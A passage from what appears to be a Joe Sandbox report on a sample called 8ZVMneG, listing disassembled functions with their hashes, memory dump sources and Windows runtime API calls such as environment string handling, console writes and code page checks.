                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0a77cd9fb4c9948a7dba218f0058ab721715d8ef4dc17964d12b40b6719d9018
                                                                                                                                                                                                                                                                  • Instruction ID: efecc5e844cbc9b1ecf4b1e6e24f1d9a28fbef722fabbc74f2ac51158c5fbdb9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a77cd9fb4c9948a7dba218f0058ab721715d8ef4dc17964d12b40b6719d9018
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0221B372609215BF9B21AF768C8096AB7E9EF44368710951AF829B7341DB35EC42CB90
                                                                                                                                                                                                                                                                  Function 00ECEA02 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ddb41ff6124d86a6e36ac08eaac4bdb840b9b5c50bb73a3832cdfa69e9a25c91
                                                                                                                                                                                                                                                                  • Instruction ID: 15ba6abbd8db3345adcbbda54d2645a20ac357a50868277dd810dfe7608eea8c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddb41ff6124d86a6e36ac08eaac4bdb840b9b5c50bb73a3832cdfa69e9a25c91
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C219F32600215AF9B21EF71CD81E6A77A9FF44368714A91DF825B7351EB32ED038791
                                                                                                                                                                                                                                                                  Function 00EDE52B Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00EDE533
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED7491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ED8CE1,?,00000000,-00000008), ref: 00ED74F2
                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EDE56B
                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EDE58B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 158306478-0
                                                                                                                                                                                                                                                                  • Opcode ID: 525bcf610b571ba788fee61b8bc12346990498b9be0549b62cb06ad2a0de62e2
                                                                                                                                                                                                                                                                  • Instruction ID: d91e2b4ebd4c7f00a9eaa3f45ca20c4a7a758a39368e73bda5d1fb9bb9e5f677
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 525bcf610b571ba788fee61b8bc12346990498b9be0549b62cb06ad2a0de62e2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA118BB1905255BE672537766C8ECBF6A9CDF883EC710202AF841B9341FA20DE4292B1
                                                                                                                                                                                                                                                                  Function 00EC1690 Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00EC16BD
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00EC16CB
                                                                                                                                                                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00EC16E4
                                                                                                                                                                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00EC1723
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2261580123-0
                                                                                                                                                                                                                                                                  • Opcode ID: ef7cfd8afb03168c140b080900f1812be139d7edda010cb360779e3a2061c72b
                                                                                                                                                                                                                                                                  • Instruction ID: 45f4588f042a13730dc6a4fd73e1aefb1fde306a28f23c2f59869149e72d251f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef7cfd8afb03168c140b080900f1812be139d7edda010cb360779e3a2061c72b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521EAB4E042098FCB08EF98D695BADBBF1BF49304F01946DE449BB351DB359942CB51
                                                                                                                                                                                                                                                                  Function 00ECAA61 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00ECAA68
                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00ECAA72
                                                                                                                                                                                                                                                                    • Part of subcall function 00EC4080: std::_Lockit::_Lockit.LIBCPMT ref: 00EC40AE
                                                                                                                                                                                                                                                                    • Part of subcall function 00EC4080: std::_Lockit::~_Lockit.LIBCPMT ref: 00EC40D9
                                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 00ECAAAC
                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00ECAAE3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3716348337-0
                                                                                                                                                                                                                                                                  • Opcode ID: f1cf432f05d996fa560af5dd8308e4b7cca674fd99b3122c69b537d58ba993e4
                                                                                                                                                                                                                                                                  • Instruction ID: add35ea93a2fd1a64f2f184ac83a1d9165f59b0f17c3c79dc62d42247c406c30
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1cf432f05d996fa560af5dd8308e4b7cca674fd99b3122c69b537d58ba993e4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F901A5B19002199FCB05EB64DA16FBEB7B5AF80314F29111DE411772D2DF729E06C781
                                                                                                                                                                                                                                                                  Function 00EE6060 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00EE554F,00000000,00000001,00000000,?,?,00EDF6FB,?,00000000,00000000), ref: 00EE6077
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00EE554F,00000000,00000001,00000000,?,?,00EDF6FB,?,00000000,00000000,?,?,?,00EDF041,00000000), ref: 00EE6083
                                                                                                                                                                                                                                                                    • Part of subcall function 00EE60D4: CloseHandle.KERNEL32(FFFFFFFE,00EE6093,?,00EE554F,00000000,00000001,00000000,?,?,00EDF6FB,?,00000000,00000000,?,?), ref: 00EE60E4
                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 00EE6093
                                                                                                                                                                                                                                                                    • Part of subcall function 00EE60B5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EE6051,00EE553C,?,?,00EDF6FB,?,00000000,00000000,?), ref: 00EE60C8
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00EE554F,00000000,00000001,00000000,?,?,00EDF6FB,?,00000000,00000000,?), ref: 00EE60A8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                  • Opcode ID: d38cb1ae185ed039cd4ef41e136da6bc3124e61f9ae7bc50267e9c5eaa0ad680
                                                                                                                                                                                                                                                                  • Instruction ID: 7a2f0bafa3e235cc52063bc91ffad357b15881495e120fdea40ab09b954d3d79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d38cb1ae185ed039cd4ef41e136da6bc3124e61f9ae7bc50267e9c5eaa0ad680
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FF01236801169BFCF722F92DC089993F65FB943A0F008010FA19A5162D7318920DB91
                                                                                                                                                                                                                                                                  Function 00EC79D0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 477COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _strcspn
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 3709121408-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: 66d39e71585a43a837da086547208115b54ba167827c0f483ce21c86d4d99220
                                                                                                                                                                                                                                                                  • Instruction ID: 3e14b8d5424633c258814a703d6dc35b3d2f89ead05e272b3c618e61be91ba4b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66d39e71585a43a837da086547208115b54ba167827c0f483ce21c86d4d99220
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C32C3B49042698FCB14DF24C981BDEBBF1BF49300F0585AEE899A7311D731AA85CF91
                                                                                                                                                                                                                                                                  Function 00EDBD15 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00ED19AE,?,?,?,00000055,?,-00000050,?,?,?), ref: 00EDBDD4
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00ED19AE,?,?,?,00000055,?,-00000050,?,?), ref: 00EDBE0B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                                  • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                  • Opcode ID: eccc00039029685c97f52c9ddd01e53f3ba411fb11ee58beebe6701e5ff6b14e
                                                                                                                                                                                                                                                                  • Instruction ID: 853bbb4923a9ed64f6b9e12bc96ba43800193eefe6d5a78d075064beb04baff2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eccc00039029685c97f52c9ddd01e53f3ba411fb11ee58beebe6701e5ff6b14e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A51B771B00306EAE724AB318C82BBA73E9EF44744F16642BF955B7381FB70D9428765
                                                                                                                                                                                                                                                                  Function 00ED6DFE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00ED6CFF,?,?,00000000,00000000,00000000,?), ref: 00ED6E23
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                  • Opcode ID: 6e4674b952c113e64c88412477475d5b1a2261c3f2e87467e3fc5794546010c3
                                                                                                                                                                                                                                                                  • Instruction ID: 1c09e155d17312a1692376881eee10b29e2be070a2ca054302b18625be207d14
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e4674b952c113e64c88412477475d5b1a2261c3f2e87467e3fc5794546010c3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F416A72A00209AFCF15DF98DD81AAEBBB5FF48308F14505AF914B7251D3359A52DB60
                                                                                                                                                                                                                                                                  Function 00ED666A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00ED68E1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                  • Opcode ID: c551890dc65e75ed34179e6ab7c5200fb19cddc015b91c2ebb1b59f386fbde5d
                                                                                                                                                                                                                                                                  • Instruction ID: f84134ad6bd1223e6bde0e9a9fe6b683e0f8b7c29e4aed3de8f071ede89e3d58
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c551890dc65e75ed34179e6ab7c5200fb19cddc015b91c2ebb1b59f386fbde5d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5031E732400218DFCF268F54CD549AA7B66FF89329B18616BF95469321D332DC63DF81
                                                                                                                                                                                                                                                                  Function 00EC8EAA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ECB1A0
                                                                                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00ECB288
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                  • String ID: (9
                                                                                                                                                                                                                                                                  • API String ID: 3761405300-3464744488
                                                                                                                                                                                                                                                                  • Opcode ID: f5dc37cb27692b757428cc8ff63a6170f13b1f2b35ae1f0661040fa69a6bbecd
                                                                                                                                                                                                                                                                  • Instruction ID: f66cc1756fa94e74e0e9f95ed1bfa1ce6ecb4c6bc759488c97f9928b8c5acc89
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5dc37cb27692b757428cc8ff63a6170f13b1f2b35ae1f0661040fa69a6bbecd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E2116B4611B409FD314DF27ED86660BBE4BBC8310F10941AE549BB7B1E3B19689CF44
                                                                                                                                                                                                                                                                  Function 00ECB0B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ECB0C3
                                                                                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00ECB180
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
